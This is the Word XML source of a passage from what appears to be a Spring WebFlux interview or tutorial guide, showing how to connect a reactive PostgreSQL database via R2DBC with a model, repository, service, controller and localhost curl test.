    <w:p w14:paraId="288C8C59"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untimeOnly 'com.h2database:h2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F0F073"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60453581" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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2. Configure Database Connection (application.yml)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A228BE0"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Next, you need to configure the database connection in your application.yml or application.properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5CED6F" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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application.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0DAC17"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598FD66E"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2dbc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E221F43"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url: r2dbc:postgresql://localhost:5432/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E163D5B"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username: myuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363CBB2E"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assword: mypassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E59592"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data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA7F547"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2dbc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62798C91"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positories:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C128677"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nabled: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBD83BC" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A738A8F"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r2dbc.url=r2dbc:postgresql://localhost:5432/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D973977"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r2dbc.username=myuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D842F77"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r2dbc.password=mypassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531DF2FF"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data.r2dbc.repositories.enabled=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0009C3" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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3. Create a Domain Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F83519B"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Create a domain model that corresponds to a table in your database. For instance, an Item model might look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDEAA5B"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annotation.Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583A596C"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relational.core.mapping.Table;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51856185" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04FB0AA1"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able("items")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD377C4"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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A6534D" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD67430"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d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D34064B"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE22F35"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4339D46D"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double price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C974113" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A849D2"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Getters and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6024E7E9"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Long getId() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E1C1C5"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d;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D35A2A"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2C36CE8F" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D9F1180"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void setId(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6F3543"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his.id = id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475B3C68"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12293F4B" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="536DEE19"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String getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B54045B"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2137F7A5"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7B242D95" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F5B99F"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void setName(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDED26B"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his.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353B1B8D"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379CD168" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="161A4CD0"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double getPrice() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A018CBA"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price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788061C8"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703427EB" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BEC62BA"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void setPrice(double price) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569432E4"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his.price = price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E712CF2"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26D60AC5"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7C67ECA6" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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4. Create a Repository for Database Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EE8847"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n Spring WebFlux, repositories are used to interact with the database. We will create a repository interface using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEEDBE5"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repository.reactive.ReactiveCrudRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C769A55" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D0BAD48"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interface ItemRepository extends ReactiveCrudRepository&lt;Item, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74038D7A"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You can define custom queries here if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475777EF"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01A0D3FC"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ReactiveCrudRepository provides methods like save(), findById(), findAll(), and more, which will be executed in a non-blocking, reactive way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F11AF4" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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5. Create a Reactive Service Layer (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A3C327"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Create a service class that uses the repository to fetch data reactively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A82A392"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C9E585"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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C76CBC0"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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64735393"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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375A0B8A" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14797E82"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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F6FEBF"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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05979DBD" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="248AFF8E"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037A9E4A"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ItemRepository itemRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12173D19" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="208FB51C"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Flux&lt;Item&gt; getAllItems() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4423C285"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Repository.findAll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEA4FDE"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A06D289" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C7B845"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Item&gt; getItemById(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F51B7C"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Repository.findById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402C5DF5"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011D47DD" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B5AA42D"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Item&gt; createItem(Item item) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5949B6"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Repository.save(item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6D979E"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0A5E73B3"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648951B2" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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6. Create a Reactive Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310184C"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inally, create a reactive controller that will expose endpoints to interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B80CE0A"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376D127A"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web.bind.annotation.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6AAFAE"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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE28C7E"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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47346F00" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419339CD"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481D4F67"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questMapping("/api/items")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277C0BC5"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Controller {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDC46E0" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0997F611"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C792DD"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ItemService itemService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7459F3F6" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F10FBD"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etMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF5AABC"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Item&gt; getItemById(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA3EFC6"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Service.getItemById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323253F9"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4FCC5784" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D46378B"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etMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CDD279"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Flux&lt;Item&gt; getAllItems() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281032EA"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Service.getAllItems();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107E1560"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5006B999" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D0B057D"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ostMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADE5D43"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Item&gt; createItem(@RequestBody Item item) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAC8670"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Service.createItem(item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AE723E"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5761A284"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57A494AB" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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7. Run the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE8417B"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un the Spring Boot application using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C24F1F5"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vnw spring-boot:run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606341E2"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f using Gradle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE35AEF"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gradlew bootRun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2468E0"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Now you can interact with the database using the exposed reactive endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D8425A" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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8. Test the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D763C88"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Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Postman</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curl</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you can test the reactive API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFCEBFA"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GET /api/items</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Fetch all items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F57CA3"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GET /api/items/{id}</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Fetch a specific item by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BB3023"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POST /api/items</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Create a new item (send JSON with name and price)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C328E05"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xample using curl to fetch all items:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7F6348"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curl http://localhost:8080/api/items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44109899"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sponse:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBAFE72"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5FC04596"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d":1,"name":"Item 1","price":100.0},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3A7417"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d":2,"name":"Item 2","price":200.0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53848613"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E185A26" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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9. Advantages of Reactive Database Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27473614"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Non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Database queries are non-blocking, which means the thread doesn't wait for the database operation to complete and can serve other requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F261AC"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Backpressure Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The reactive stream can handle backpressure by slowing down data processing when the consumer is unable to keep up with the producer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A99FD77"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calability</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Reactive programming allows handling more requests concurrently, improving scalability by utilizing fewer threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009DB359" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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onclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF60D36" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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By integrating </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or any other reactive database driver) with Spring WebFlux, you can build a non-blocking, scalable web application. The database access becomes reactive, which improves the application's performance and responsiveness under load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34498F55"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7B5826B">
          <v:rect id="_x0000_i2322" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="050C872D" w14:textId="7043B84E" w:rsidR="00163F3B" w:rsidRPr="00CE4B95" w:rsidRDefault="004A4102" w:rsidP="004A4102">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="523" w:name="_Toc196308003"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the steps to connect a reactive database (like MongoDB or R2DBC) to Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="523"/>
    </w:p>
    <w:p w14:paraId="08831953" w14:textId="6A89060A" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0"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o connect a reactive database (like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MongoDB</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R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) to a Spring WebFlux application, you need to follow a few key steps. Below are the steps to integrate both </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MongoDB</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R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
